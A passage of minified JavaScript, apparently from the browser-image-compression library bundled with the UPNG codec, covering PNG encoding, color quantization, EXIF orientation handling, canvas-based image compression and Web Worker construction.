if(0==de){for(F=0;F<j;F++)Pe[I+F]=we[ae+F];if(2==$)for(F=j;F<ie;F++)Pe[I+F]=we[ae+F];if(3==$)for(F=j;F<ie;F++)Pe[I+F]=we[ae+F]-(we[ae+F-j]>>1)+256&255;if(4==$)for(F=j;F<ie;F++)Pe[I+F]=we[ae+F]-Q(we[ae+F-j],0,0)+256&255}else{if(2==$)for(F=0;F<ie;F++)Pe[I+F]=we[ae+F]+256-we[ae+F-ie]&255;if(3==$){for(F=0;F<j;F++)Pe[I+F]=we[ae+F]+256-(we[ae+F-ie]>>1)&255;for(F=j;F<ie;F++)Pe[I+F]=we[ae+F]+256-(we[ae+F-ie]+we[ae+F-j]>>1)&255}if(4==$){for(F=0;F<j;F++)Pe[I+F]=we[ae+F]+256-Q(0,we[ae+F-ie],0)&255;for(F=j;F<ie;F++)Pe[I+F]=we[ae+F]+256-Q(we[ae+F-j],we[ae+F-ie],we[ae+F-j-ie])&255}}},UPNG.crc={table:function(){for(var Pe=new Uint32Array(256),we=0;we<256;we++){for(var de=we,ie=0;ie<8;ie++)1&de?de=3988292384^de>>>1:de>>>=1;Pe[we]=de}return Pe}(),update:function(we,de,ie,j){for(var $=0;$<j;$++)we=UPNG.crc.table[255&(we^de[ie+$])]^we>>>8;return we},crc:function(we,de,ie){return 4294967295^UPNG.crc.update(4294967295,we,de,ie)}},UPNG.quantize=function(Pe,we){var de,ie=new Uint8Array(Pe),j=ie.slice(0),$=new Uint32Array(j.buffer),ae=UPNG.quantize.getKDtree(j,we),I=ae[0],Q=ae[1],F=UPNG.quantize.planeDst,E=ie,g=$,b=E.length,_=new Uint8Array(ie.length>>2);if(ie.length<2e7)for(var y=0;y<b;y+=4){var M=.00392156862745098*E[y],p=E[y+1]*(1/255),D=E[y+2]*(1/255),w=E[y+3]*(1/255);de=UPNG.quantize.getNearest(I,M,p,D,w),_[y>>2]=de.ind,g[y>>2]=de.est.rgba}else for(y=0;y<b;y+=4){for(M=E[y]*(1/255),p=E[y+1]*(1/255),D=E[y+2]*(1/255),w=E[y+3]*(1/255),de=I;de.left;)de=F(de.est,M,p,D,w)<=0?de.left:de.right;_[y>>2]=de.ind,g[y>>2]=de.est.rgba}return{abuf:j.buffer,inds:_,plte:Q}},UPNG.quantize.getKDtree=function(Pe,we,de){null==de&&(de=1e-4);var ie=new Uint32Array(Pe.buffer),j={i0:0,i1:Pe.length,bst:null,est:null,tdst:0,left:null,right:null};j.bst=UPNG.quantize.stats(Pe,j.i0,j.i1),j.est=UPNG.quantize.estats(j.bst);for(var $=[j];$.length<we;){for(var ae=0,I=0,Q=0;Q<$.length;Q++)$[Q].est.L>ae&&(ae=$[Q].est.L,I=Q);if(ae<de)break;var F=$[I],E=UPNG.quantize.splitPixels(Pe,ie,F.i0,F.i1,F.est.e,F.est.eMq255);if(F.i0>=E||F.i1<=E)F.est.L=0;else{var g={i0:F.i0,i1:E,bst:null,est:null,tdst:0,left:null,right:null};g.bst=UPNG.quantize.stats(Pe,g.i0,g.i1),g.est=UPNG.quantize.estats(g.bst);var b={i0:E,i1:F.i1,bst:null,est:null,tdst:0,left:null,right:null};for(b.bst={R:[],m:[],N:F.bst.N-g.bst.N},Q=0;Q<16;Q++)b.bst.R[Q]=F.bst.R[Q]-g.bst.R[Q];for(Q=0;Q<4;Q++)b.bst.m[Q]=F.bst.m[Q]-g.bst.m[Q];b.est=UPNG.quantize.estats(b.bst),F.left=g,F.right=b,$[I]=g,$.push(b)}}for($.sort(function(_,y){return y.bst.N-_.bst.N}),Q=0;Q<$.length;Q++)$[Q].ind=Q;return[j,$]},UPNG.quantize.getNearest=function(Pe,we,de,ie,j){if(null==Pe.left)return Pe.tdst=UPNG.quantize.dist(Pe.est.q,we,de,ie,j),Pe;var $=UPNG.quantize.planeDst(Pe.est,we,de,ie,j),ae=Pe.left,I=Pe.right;$>0&&(ae=Pe.right,I=Pe.left);var Q=UPNG.quantize.getNearest(ae,we,de,ie,j);if(Q.tdst<=$*$)return Q;var F=UPNG.quantize.getNearest(I,we,de,ie,j);return F.tdst<Q.tdst?F:Q},UPNG.quantize.planeDst=function(Pe,we,de,ie,j){var $=Pe.e;return $[0]*we+$[1]*de+$[2]*ie+$[3]*j-Pe.eMq},UPNG.quantize.dist=function(Pe,we,de,ie,j){var $=we-Pe[0],ae=de-Pe[1],I=ie-Pe[2],Q=j-Pe[3];return $*$+ae*ae+I*I+Q*Q},UPNG.quantize.splitPixels=function(Pe,we,de,ie,j,$){var ae=UPNG.quantize.vecDot;for(ie-=4;de<ie;){for(;ae(Pe,de,j)<=$;)de+=4;for(;ae(Pe,ie,j)>$;)ie-=4;if(de>=ie)break;var I=we[de>>2];we[de>>2]=we[ie>>2],we[ie>>2]=I,de+=4,ie-=4}for(;ae(Pe,de,j)>$;)de-=4;return de+4},UPNG.quantize.vecDot=function(Pe,we,de){return Pe[we]*de[0]+Pe[we+1]*de[1]+Pe[we+2]*de[2]+Pe[we+3]*de[3]},UPNG.quantize.stats=function(Pe,we,de){for(var ie=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],j=[0,0,0,0],$=de-we>>2,ae=we;ae<de;ae+=4){var I=.00392156862745098*Pe[ae],Q=Pe[ae+1]*(1/255),F=Pe[ae+2]*(1/255),E=Pe[ae+3]*(1/255);j[0]+=I,j[1]+=Q,j[2]+=F,j[3]+=E,ie[0]+=I*I,ie[1]+=I*Q,ie[2]+=I*F,ie[3]+=I*E,ie[5]+=Q*Q,ie[6]+=Q*F,ie[7]+=Q*E,ie[10]+=F*F,ie[11]+=F*E,ie[15]+=E*E}return ie[4]=ie[1],ie[8]=ie[2],ie[9]=ie[6],ie[12]=ie[3],ie[13]=ie[7],ie[14]=ie[11],{R:ie,m:j,N:$}},UPNG.quantize.estats=function(Pe){var we=Pe.R,de=Pe.m,ie=Pe.N,j=de[0],$=de[1],ae=de[2],I=de[3],Q=0==ie?0:1/ie,F=[we[0]-j*j*Q,we[1]-j*$*Q,we[2]-j*ae*Q,we[3]-j*I*Q,we[4]-$*j*Q,we[5]-$*$*Q,we[6]-$*ae*Q,we[7]-$*I*Q,we[8]-ae*j*Q,we[9]-ae*$*Q,we[10]-ae*ae*Q,we[11]-ae*I*Q,we[12]-I*j*Q,we[13]-I*$*Q,we[14]-I*ae*Q,we[15]-I*I*Q],E=F,g=UPNG.M4,b=[Math.random(),Math.random(),Math.random(),Math.random()],_=0,y=0;if(0!=ie)for(var M=0;M<16&&(b=g.multVec(E,b),y=Math.sqrt(g.dot(b,b)),b=g.sml(1/y,b),!(0!=M&&Math.abs(y-_)<1e-9));M++)_=y;var p=[j*Q,$*Q,ae*Q,I*Q];return{Cov:F,q:p,e:b,L:_,eMq255:g.dot(g.sml(255,p),b),eMq:g.dot(b,p),rgba:(Math.round(255*p[3])<<24|Math.round(255*p[2])<<16|Math.round(255*p[1])<<8|Math.round(255*p[0])<<0)>>>0}},UPNG.M4={multVec:function(we,de){return[we[0]*de[0]+we[1]*de[1]+we[2]*de[2]+we[3]*de[3],we[4]*de[0]+we[5]*de[1]+we[6]*de[2]+we[7]*de[3],we[8]*de[0]+we[9]*de[1]+we[10]*de[2]+we[11]*de[3],we[12]*de[0]+we[13]*de[1]+we[14]*de[2]+we[15]*de[3]]},dot:function(we,de){return we[0]*de[0]+we[1]*de[1]+we[2]*de[2]+we[3]*de[3]},sml:function(we,de){return[we*de[0],we*de[1],we*de[2],we*de[3]]}},UPNG.encode.concatRGBA=function(Pe){for(var we=0,de=0;de<Pe.length;de++)we+=Pe[de].byteLength;var ie=new Uint8Array(we),j=0;for(de=0;de<Pe.length;de++){for(var $=new Uint8Array(Pe[de]),ae=$.length,I=0;I<ae;I+=4){var Q=$[I],F=$[I+1],E=$[I+2],g=$[I+3];0==g&&(Q=F=E=0),ie[j+I]=Q,ie[j+I+1]=F,ie[j+I+2]=E,ie[j+I+3]=g}j+=ae}return ie.buffer};var BROWSER_NAME={CHROME:"CHROME",FIREFOX:"FIREFOX",DESKTOP_SAFARI:"DESKTOP_SAFARI",IE:"IE",MOBILE_SAFARI:"MOBILE_SAFARI",ETC:"ETC"},_BROWSER_NAME$CHROME$,MAX_CANVAS_SIZE=(_BROWSER_NAME$CHROME$={},_defineProperty(_BROWSER_NAME$CHROME$,BROWSER_NAME.CHROME,16384),_defineProperty(_BROWSER_NAME$CHROME$,BROWSER_NAME.FIREFOX,11180),_defineProperty(_BROWSER_NAME$CHROME$,BROWSER_NAME.DESKTOP_SAFARI,16384),_defineProperty(_BROWSER_NAME$CHROME$,BROWSER_NAME.IE,8192),_defineProperty(_BROWSER_NAME$CHROME$,BROWSER_NAME.MOBILE_SAFARI,4096),_defineProperty(_BROWSER_NAME$CHROME$,BROWSER_NAME.ETC,8192),_BROWSER_NAME$CHROME$),isBrowser="undefined"!=typeof window,moduleMapper=isBrowser&&window.cordova&&window.cordova.require&&window.cordova.require("cordova/modulemapper"),CustomFile=isBrowser&&(moduleMapper&&moduleMapper.getOriginalSymbol(window,"File")||void 0!==window.File&&File),CustomFileReader=isBrowser&&(moduleMapper&&moduleMapper.getOriginalSymbol(window,"FileReader")||void 0!==window.FileReader&&FileReader);function getFilefromDataUrl(Pe,we){var de=arguments.length>2&&void 0!==arguments[2]?arguments[2]:Date.now();return new Promise(function(ie){for(var j=Pe.split(","),$=j[0].match(/:(.*?);/)[1],ae=globalThis.atob(j[1]),I=ae.length,Q=new Uint8Array(I);I--;)Q[I]=ae.charCodeAt(I);var F=new Blob([Q],{type:$});F.name=we,F.lastModified=de,ie(F)})}function getDataUrlFromFile(Pe){return new Promise(function(we,de){var ie=new CustomFileReader;ie.onload=function(){return we(ie.result)},ie.onerror=function(j){return de(j)},ie.readAsDataURL(Pe)})}function loadImage(Pe){return new Promise(function(we,de){var ie=new Image;ie.onload=function(){return we(ie)},ie.onerror=function(j){return de(j)},ie.src=Pe})}function getBrowserName(){if(void 0!==getBrowserName.cachedResult)return getBrowserName.cachedResult;var Pe=BROWSER_NAME.ETC,we=navigator.userAgent;return/Chrom(e|ium)/i.test(we)?Pe=BROWSER_NAME.CHROME:/iP(ad|od|hone)/i.test(we)&&/WebKit/i.test(we)&&!/(CriOS|FxiOS|OPiOS|mercury)/i.test(we)?Pe=BROWSER_NAME.MOBILE_SAFARI:/Safari/i.test(we)?Pe=BROWSER_NAME.DESKTOP_SAFARI:/Firefox/i.test(we)?Pe=BROWSER_NAME.FIREFOX:(/MSIE/i.test(we)||!!document.documentMode)&&(Pe=BROWSER_NAME.IE),getBrowserName.cachedResult=Pe,getBrowserName.cachedResult}function approximateBelowMaximumCanvasSizeOfBrowser(Pe,we){for(var de=getBrowserName(),ie=MAX_CANVAS_SIZE[de],j=Pe,$=we,ae=j*$,I=j>$?$/j:j/$;ae>ie*ie;){var Q=(ie+j)/2,F=(ie+$)/2;Q<F?($=F,j=F*I):($=Q*I,j=Q),ae=j*$}return{width:j,height:$}}function getNewCanvasAndCtx(Pe,we){var de,ie;try{if(null===(ie=(de=new OffscreenCanvas(Pe,we)).getContext("2d")))throw new Error("getContext of OffscreenCanvas returns null")}catch(j){ie=(de=document.createElement("canvas")).getContext("2d")}return de.width=Pe,de.height=we,[de,ie]}function drawImageInCanvas(Pe){var we=arguments.length>1&&void 0!==arguments[1]?arguments[1]:void 0,de=approximateBelowMaximumCanvasSizeOfBrowser(Pe.width,Pe.height),ie=de.width,j=de.height,$=getNewCanvasAndCtx(ie,j),ae=_slicedToArray($,2),I=ae[0],Q=ae[1];return we&&/jpe?g/.test(we)&&(Q.fillStyle="white",Q.fillRect(0,0,I.width,I.height)),Q.drawImage(Pe,0,0,I.width,I.height),I}function isIOS(){return void 0!==isIOS.cachedResult||(isIOS.cachedResult=["iPad Simulator","iPhone Simulator","iPod Simulator","iPad","iPhone","iPod"].includes(navigator.platform)||navigator.userAgent.includes("Mac")&&"undefined"!=typeof document&&"ontouchend"in document),isIOS.cachedResult}function drawFileInCanvas(Pe){var we=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{};return new Promise(function(de,ie){var j,$,ae=function(){try{return $=drawImageInCanvas(j,we.fileType||Pe.type),de([j,$])}catch(F){return ie(F)}},I=function(F){try{var E=function(b){try{throw b}catch(_){return ie(_)}};try{return getDataUrlFromFile(Pe).then(function(g){try{return loadImage(g).then(function(b){try{return j=b,function(){try{return ae()}catch(y){return ie(y)}}()}catch(_){return E(_)}},E)}catch(b){return E(b)}},E)}catch(g){E(g)}}catch(g){return ie(g)}};try{if(isIOS()||[BROWSER_NAME.DESKTOP_SAFARI,BROWSER_NAME.MOBILE_SAFARI].includes(getBrowserName()))throw new Error("Skip createImageBitmap on IOS and Safari");return createImageBitmap(Pe).then(function(Q){try{return j=Q,ae()}catch(F){return I()}},I)}catch(Q){I()}})}function canvasToFile(Pe,we,de,ie){var j=arguments.length>4&&void 0!==arguments[4]?arguments[4]:1;return new Promise(function($,ae){var I,Q,F;if("image/png"===we)return Q=Pe.getContext("2d").getImageData(0,0,Pe.width,Pe.height).data,F=UPNG.encode([Q],Pe.width,Pe.height,256*j),(I=new Blob([F],{type:we})).name=de,I.lastModified=ie,E.call(this);{let g=function(){return E.call(this)};return"function"==typeof OffscreenCanvas&&Pe instanceof OffscreenCanvas?Pe.convertToBlob({type:we,quality:j}).then(function(b){try{return(I=b).name=de,I.lastModified=ie,g.call(this)}catch(_){return ae(_)}}.bind(this),ae):getFilefromDataUrl(Pe.toDataURL(we,j),de,ie).then(function(b){try{return I=b,g.call(this)}catch(_){return ae(_)}}.bind(this),ae)}function E(){return $(I)}})}function cleanupCanvasMemory(Pe){Pe.width=0,Pe.height=0}function isAutoOrientationInBrowser(){return new Promise(function(Pe,we){var de,ie,j,$;return void 0!==isAutoOrientationInBrowser.cachedResult?Pe(isAutoOrientationInBrowser.cachedResult):getFilefromDataUrl("data:image/jpeg;base64,/9j/4QAiRXhpZgAATU0AKgAAAAgAAQESAAMAAAABAAYAAAAAAAD/2wCEAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAf/AABEIAAEAAgMBEQACEQEDEQH/xABKAAEAAAAAAAAAAAAAAAAAAAALEAEAAAAAAAAAAAAAAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAEQEAAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIRAxEAPwA/8H//2Q==","test.jpg",Date.now()).then(function(ae){try{return drawFileInCanvas(de=ae).then(function(I){try{return canvasToFile(ie=I[1],de.type,de.name,de.lastModified).then(function(Q){try{return j=Q,cleanupCanvasMemory(ie),drawFileInCanvas(j).then(function(F){try{return isAutoOrientationInBrowser.cachedResult=1===($=F[0]).width&&2===$.height,Pe(isAutoOrientationInBrowser.cachedResult)}catch(E){return we(E)}},we)}catch(F){return we(F)}},we)}catch(Q){return we(Q)}},we)}catch(I){return we(I)}},we)})}function getExifOrientation(Pe){return new Promise(function(we,de){var ie=new CustomFileReader;ie.onload=function(j){var $=new DataView(j.target.result);if(65496!=$.getUint16(0,!1))return we(-2);for(var ae=$.byteLength,I=2;I<ae;){if($.getUint16(I+2,!1)<=8)return we(-1);var Q=$.getUint16(I,!1);if(I+=2,65505==Q){if(1165519206!=$.getUint32(I+=2,!1))return we(-1);var F=18761==$.getUint16(I+=6,!1);I+=$.getUint32(I+4,F);var E=$.getUint16(I,F);I+=2;for(var g=0;g<E;g++)if(274==$.getUint16(I+12*g,F))return we($.getUint16(I+12*g+8,F))}else{if(65280!=(65280&Q))break;I+=$.getUint16(I,!1)}}return we(-1)},ie.onerror=function(j){return de(j)},ie.readAsArrayBuffer(Pe)})}function handleMaxWidthOrHeight(Pe,we){var de,ie=Pe.width,j=Pe.height,$=we.maxWidthOrHeight,ae=Pe;if(isFinite($)&&(ie>$||j>$)){var I=_slicedToArray(getNewCanvasAndCtx(ie,j),2);ae=I[0],de=I[1],ie>j?(ae.width=$,ae.height=j/ie*$):(ae.width=ie/j*$,ae.height=$),de.drawImage(Pe,0,0,ae.width,ae.height),cleanupCanvasMemory(Pe)}return ae}function followExifOrientation(Pe,we){var de=Pe.width,ie=Pe.height,j=_slicedToArray(getNewCanvasAndCtx(de,ie),2),$=j[0],ae=j[1];switch(we>4&&we<9?($.width=ie,$.height=de):($.width=de,$.height=ie),we){case 2:ae.transform(-1,0,0,1,de,0);break;case 3:ae.transform(-1,0,0,-1,de,ie);break;case 4:ae.transform(1,0,0,-1,0,ie);break;case 5:ae.transform(0,1,1,0,0,0);break;case 6:ae.transform(0,1,-1,0,ie,0);break;case 7:ae.transform(0,-1,-1,0,ie,de);break;case 8:ae.transform(0,-1,1,0,0,de)}return ae.drawImage(Pe,0,0,de,ie),cleanupCanvasMemory(Pe),$}function compress(Pe,we){var de=arguments.length>2&&void 0!==arguments[2]?arguments[2]:0;return new Promise(function(ie,j){var $,ae,I,Q,F,E,g,b,_,y,M,p,D,w,x,S,O,U,K;function ee(){var ve=arguments.length>0&&void 0!==arguments[0]?arguments[0]:5;if(we.signal&&we.signal.aborted)throw we.signal.reason;$+=ve,we.onProgress(Math.min($,100))}function se(ve){if(we.signal&&we.signal.aborted)throw we.signal.reason;$=Math.min(Math.max(ve,$),100),we.onProgress($)}return $=de,ae=we.maxIteration||10,I=1024*we.maxSizeMB*1024,ee(),drawFileInCanvas(Pe,we).then(function(ve){try{var le=_slicedToArray(ve,2);return Q=le[1],ee(),F=handleMaxWidthOrHeight(Q,we),ee(),new Promise(function(ye,z){var l;if(!(l=we.exifOrientation))return getExifOrientation(Pe).then(function(A){try{return l=A,f.call(this)}catch(v){return z(v)}}.bind(this),z);function f(){return ye(l)}return f.call(this)}).then(function(ye){try{return E=ye,ee(),isAutoOrientationInBrowser().then(function(z){try{return g=z?F:followExifOrientation(F,E),ee(),canvasToFile(g,_=we.fileType||Pe.type,Pe.name,Pe.lastModified,b=we.initialQuality||1).then(function(l){try{{let A=function(){if(ae--&&(x>I||x>D)){var P,G,X=_slicedToArray(getNewCanvasAndCtx(P=K?.95*U.width:U.width,G=K?.95*U.height:U.height),2);return O=X[0],X[1].drawImage(U,0,0,P,G),canvasToFile(O,_,Pe.name,Pe.lastModified,b*=.95).then(function(L){try{return S=L,cleanupCanvasMemory(U),U=O,x=S.size,se(Math.min(99,Math.floor((w-x)/(w-I)*100))),A}catch(h){return j(h)}},j)}return[1]},v=function(){return cleanupCanvasMemory(U),cleanupCanvasMemory(O),cleanupCanvasMemory(F),cleanupCanvasMemory(g),cleanupCanvasMemory(Q),se(100),ie(S)};return y=l,ee(),p=y.size>Pe.size,(M=y.size>I)||p?(D=Pe.size,x=w=y.size,U=g,K=!we.alwaysKeepResolution&&M,(f=function(P){for(;P;){if(P.then)return void P.then(f,j);try{if(P.pop){if(P.length)return P.pop()?v.call(this):P;P=A}else P=P.call(this)}catch(G){return j(G)}}}.bind(this))(A)):(se(100),ie(y));var f}}catch(A){return j(A)}}.bind(this),j)}catch(l){return j(l)}}.bind(this),j)}catch(z){return j(z)}}.bind(this),j)}catch(ye){return j(ye)}}.bind(this),j)})}var cnt=0,imageCompressionLibUrl,worker;function createWorker(Pe){var we=[];return we.push("function"==typeof Pe?"(".concat(Pe,")()"):Pe),new Worker(URL.createObjectURL(new Blob(we)))}function createSourceObject(Pe){return URL.createObjectURL(new Blob([Pe],{type:"application/javascript"}))}function stringify(Pe){return JSON.stringify(Pe,function(we,de){return"function"==typeof de?"BIC_FN:::(function () { return ".concat(de.toString()," })()"):de})}function parse(o){if("string"==typeof o)return o;var result={};return Object.entries(o).forEach(function(_ref){var _ref2=_slicedToArray(_ref,2),key=_ref2[0],value=_ref2[1];if("string"==typeof value&&value.startsWith("BIC_FN:::"))try{result[key]=eval(value.replace(/^BIC_FN:::/,""))}catch(Pe){throw Pe}else result[key]=parse(value)}),result}function generateLib(){return createSourceObject("\n    // reconstruct library\n    function imageCompression (){return (".concat(imageCompression,").apply(null, arguments)}\n\n    imageCompression.getDataUrlFromFile = ").concat(imageCompression.getDataUrlFromFile,"\n    imageCompression.getFilefromDataUrl = ").concat(imageCompression.getFilefromDataUrl,"\n    imageCompression.loadImage = ").concat(imageCompression.loadImage,"\n    imageCompression.drawImageInCanvas = ").concat(imageCompression.drawImageInCanvas,"\n    imageCompression.drawFileInCanvas = ").concat(imageCompression.drawFileInCanvas,"\n    imageCompression.canvasToFile = ").concat(imageCompression.canvasToFile,"\n    imageCompression.getExifOrientation = ").concat(imageCompression.getExifOrientation,"\n    imageCompression.handleMaxWidthOrHeight = ").concat(imageCompression.handleMaxWidthOrHeight,"\n    imageCompression.followExifOrientation = ").concat(imageCompression.followExifOrientation,"\n    imageCompression.cleanupCanvasMemory = ").concat(imageCompression.cleanupCanvasMemory,"\n    imageCompression.isAutoOrientationInBrowser = ").concat(imageCompression.isAutoOrientationInBrowser,"\n    imageCompression.approximateBelowMaximumCanvasSizeOfBrowser = ").concat(imageCompression.approximateBelowMaximumCanvasSizeOfBrowser,"\n    imageCompression.getBrowserName = ").concat(imageCompression.getBrowserName,"\n\n    // functions / objects\n    getDataUrlFromFile = imageCompression.getDataUrlFromFile\n    getFilefromDataUrl = imageCompression.getFilefromDataUrl\n    loadImage = imageCompression.loadImage\n    drawImageInCanvas = imageCompression.drawImageInCanvas\n    drawFileInCanvas = imageCompression.drawFileInCanvas\n    canvasToFile = imageCompression.canvasToFile\n    getExifOrientation = imageCompression.getExifOrientation\n    handleMaxWidthOrHeight = imageCompression.handleMaxWidthOrHeight\n    followExifOrientation = imageCompression.followExifOrientation\n    cleanupCanvasMemory = imageCompression.cleanupCanvasMemory\n    isAutoOrientationInBrowser = imageCompression.isAutoOrientationInBrowser\n    approximateBelowMaximumCanvasSizeOfBrowser = imageCompression.approximateBelowMaximumCanvasSizeOfBrowser\n    getBrowserName = imageCompression.getBrowserName\n    isIOS = ").concat(isIOS,"\n    \n    getNewCanvasAndCtx = ").concat(getNewCanvasAndCtx,"\n    CustomFileReader = FileReader\n    CustomFile = File\n    MAX_CANVAS_SIZE = ").concat(JSON.stringify(MAX_CANVAS_SIZE),"\n    BROWSER_NAME = ").concat(JSON.stringify(BROWSER_NAME),"\n    function compress (){return (").concat(compress,").apply(null, arguments)}\n\n    // core-js\n    function _slicedToArray(arr, n) { return arr }\n    function _typeof(a) { return typeof a }\n    function _objectSpread2(target) {\n      for (var i = 1; i < arguments.length; i++) {\n        var source = arguments[i] != null ? arguments[i] : {};\n  \n        Object.assign(target, source)\n      }\n  \n      return target;\n    }\n\n    // Libraries\n    const parse = ").concat(parse,"\n    const UPNG = {}\n    UPNG.toRGBA8 = ").concat(UPNG.toRGBA8,"\n    UPNG.toRGBA8.decodeImage = ").concat(UPNG.toRGBA8.decodeImage,"\n    UPNG.decode = ").concat(UPNG.decode,"\n    UPNG.decode._decompress = ").concat(UPNG.decode._decompress,"\n    UPNG.decode._inflate = ").concat(UPNG.decode._inflate,"\n    UPNG.decode._readInterlace = ").concat(UPNG.decode._readInterlace,"\n    UPNG.decode._getBPP = ").concat(UPNG.decode._getBPP," \n    UPNG.decode._filterZero = ").concat(UPNG.decode._filterZero,"\n    UPNG.decode._paeth = ").concat(UPNG.decode._paeth,"\n    UPNG.decode._IHDR = ").concat(UPNG.decode._IHDR,"\n    UPNG._bin = parse(").concat(stringify(UPNG._bin),")\n    UPNG._copyTile = ").concat(UPNG._copyTile,"\n    UPNG.encode = ").concat(UPNG.encode,"\n    UPNG.encodeLL = ").concat(UPNG.encodeLL," \n    UPNG.encode._main = ").concat(UPNG.encode._main,"\n    UPNG.encode.compressPNG = ").concat(UPNG.encode.compressPNG," \n    UPNG.encode.compress = ").concat(UPNG.encode.compress,"\n    UPNG.encode.framize = ").concat(UPNG.encode.framize," \n    UPNG.encode._updateFrame = ").concat(UPNG.encode._updateFrame," \n    UPNG.encode._prepareDiff = ").concat(UPNG.encode._prepareDiff," \n    UPNG.encode._filterZero = ").concat(UPNG.encode._filterZero," \n    UPNG.encode._filterLine = ").concat(UPNG.encode._filterLine,"\n    UPNG.encode.concatRGBA = ").concat(UPNG.encode.concatRGBA,"\n    UPNG.crc = parse(").concat(stringify(UPNG.crc),")\n    UPNG.crc.table = ( function() {\n    var tab = new Uint32Array(256);\n    for (var n=0; n<256; n++) {\n      var c = n;\n      for (var k=0; k<8; k++) {\n        if (c & 1)  c = 0xedb88320 ^ (c >>> 1);\n        else        c = c >>> 1;\n      }\n      tab[n] = c;  }\n    return tab;  })()\n    UPNG.quantize = ").concat(UPNG.quantize," \n    UPNG.quantize.getKDtree = ").concat(UPNG.quantize.getKDtree," \n    UPNG.quantize.getNearest = ").concat(UPNG.quantize.getNearest," \n    UPNG.quantize.planeDst = ").concat(UPNG.quantize.planeDst," \n    UPNG.quantize.dist = ").concat(UPNG.quantize.dist,"     \n    UPNG.quantize.splitPixels = ").concat(UPNG.quantize.splitPixels," \n    UPNG.quantize.vecDot = ").concat(UPNG.quantize.vecDot," \n    UPNG.quantize.stats = ").concat(UPNG.quantize.stats," \n    UPNG.quantize.estats = ").concat(UPNG.quantize.estats,"\n    UPNG.M4 = parse(").concat(stringify(UPNG.M4),")\n    UPNG.encode.concatRGBA = ").concat(UPNG.encode.concatRGBA,'\n    UPNG.inflateRaw=function(){\n    var H={};H.H={};H.H.N=function(N,W){var R=Uint8Array,i=0,m=0,J=0,h=0,Q=0,X=0,u=0,w=0,d=0,v,C;\n      if(N[0]==3&&N[1]==0)return W?W:new R(0);var V=H.H,n=V.b,A=V.e,l=V.R,M=V.n,I=V.A,e=V.Z,b=V.m,Z=W==null;\n      if(Z)W=new R(N.length>>>2<<5);while(i==0){i=n(N,d,1);m=n(N,d+1,2);d+=3;if(m==0){if((d&7)!=0)d+=8-(d&7);\n        var D=(d>>>3)+4,q=N[D-4]|N[D-3]<<8;if(Z)W=H.H.W(W,w+q);W.set(new R(N.buffer,N.byteOffset+D,q),w);d=D+q<<3;\n        w+=q;continue}if(Z)W=H.H.W(W,w+(1<<17));if(m==1){v=b.J;C=b.h;X=(1<<9)-1;u=(1<<5)-1}if(m==2){J=A(N,d,5)+257;\n        h=A(N,d+5,5)+1;Q=A(N,d+10,4)+4;d+=14;var E=d,j=1;for(var c=0;c<38;c+=2){b.Q[c]=0;b.Q[c+1]=0}for(var c=0;\n                                                                                                        c<Q;c++){var K=A(N,d+c*3,3);b.Q[(b.X[c]<<1)+1]=K;if(K>j)j=K}d+=3*Q;M(b.Q,j);I(b.Q,j,b.u);v=b.w;C=b.d;\n        d=l(b.u,(1<<j)-1,J+h,N,d,b.v);var r=V.V(b.v,0,J,b.C);X=(1<<r)-1;var S=V.V(b.v,J,h,b.D);u=(1<<S)-1;M(b.C,r);\n        I(b.C,r,v);M(b.D,S);I(b.D,S,C)}while(!0){var T=v[e(N,d)&X];d+=T&15;var p=T>>>4;if(p>>>8==0){W[w++]=p}else if(p==256){break}else{var z=w+p-254;\n        if(p>264){var _=b.q[p-257];z=w+(_>>>3)+A(N,d,_&7);d+=_&7}var $=C[e(N,d)&u];d+=$&15;var s=$>>>4,Y=b.c[s],a=(Y>>>4)+n(N,d,Y&15);\n        d+=Y&15;while(w<z){W[w]=W[w++-a];W[w]=W[w++-a];W[w]=W[w++-a];W[w]=W[w++-a]}w=z}}}return W.length==w?W:W.slice(0,w)};\n      H.H.W=function(N,W){var R=N.length;if(W<=R)return N;var V=new Uint8Array(R<<1);V.set(N,0);return V};\n      H.H.R=function(N,W,R,V,n,A){var l=H.H.e,M=H.H.Z,I=0;while(I<R){var e=N[M(V,n)&W];n+=e&15;var b=e>>>4;\n        if(b<=15){A[I]=b;I++}else{var Z=0,m=0;if(b==16){m=3+l(V,n,2);n+=2;Z=A[I-1]}else if(b==17){m=3+l(V,n,3);\n          n+=3}else if(b==18){m=11+l(V,n,7);n+=7}var J=I+m;while(I<J){A[I]=Z;I++}}}return n};H.H.V=function(N,W,R,V){var n=0,A=0,l=V.length>>>1;\n        while(A<R){var M=N[A+W];V[A<<1]=0;V[(A<<1)+1]=M;if(M>n)n=M;A++}while(A<l){V[A<<1]=0;V[(A<<1)+1]=0;A++}return n};\n      H.H.n=function(N,W){var R=H.H.m,V=N.length,n,A,l,M,I,e=R.j;for(var M=0;M<=W;M++)e[M]=0;for(M=1;M<V;M+=2)e[N[M]]++;\n        var b=R.K;n=0;e[0]=0;for(A=1;A<=W;A++){n=n+e[A-1]<<1;b[A]=n}for(l=0;l<V;l+=2){I=N[l+1];if(I!=0){N[l]=b[I];\n          b[I]++}}};H.H.A=function(N,W,R){var V=N.length,n=H.H.m,A=n.r;for(var l=0;l<V;l+=2)if(N[l+1]!=0){var M=l>>1,I=N[l+1],e=M<<4|I,b=W-I,Z=N[l]<<b,m=Z+(1<<b);\n        while(Z!=m){var J=A[Z]>>>15-W;R[J]=e;Z++}}};H.H.l=function(N,W){var R=H.H.m.r,V=15-W;for(var n=0;n<N.length;\n                                                                                                 n+=2){var A=N[n]<<W-N[n+1];N[n]=R[A]>>>V}};H.H.M=function(N,W,R){R=R<<(W&7);var V=W>>>3;N[V]|=R;N[V+1]|=R>>>8};\n      H.H.I=function(N,W,R){R=R<<(W&7);var V=W>>>3;N[V]|=R;N[V+1]|=R>>>8;N[V+2]|=R>>>16};H.H.e=function(N,W,R){return(N[W>>>3]|N[(W>>>3)+1]<<8)>>>(W&7)&(1<<R)-1};\n      